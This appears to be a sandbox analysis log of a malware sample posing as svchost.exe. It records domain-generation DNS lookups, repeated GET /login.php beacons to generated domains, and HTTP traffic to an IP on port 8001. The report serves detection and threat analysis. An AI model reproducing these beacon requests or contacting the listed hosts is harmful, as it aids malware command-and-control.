    Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 55362 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 55378 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 55378
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 54058
    Source: unknownNetwork traffic detected: HTTP traffic on port 54058 -> 8001
    Source: unknownNetwork traffic detected: HTTP traffic on port 8001 -> 54058
    Source: unknownNetwork traffic detected: DNS query count 1003
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA4F80 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,1_2_02CA4F80
    Source: global trafficTCP traffic: 192.168.2.4:55362 -> 47.103.150.18:8001
    Source: global trafficDNS traffic detected: number of DNS queries: 1003
    Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
    Source: Joe Sandbox ViewIP Address: 15.197.240.20 15.197.240.20
    Source: Joe Sandbox ViewIP Address: 64.190.63.136 64.190.63.136
    Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
    Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
    Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
    Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww1.lysyfyj.comConnection: Keep-AliveCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
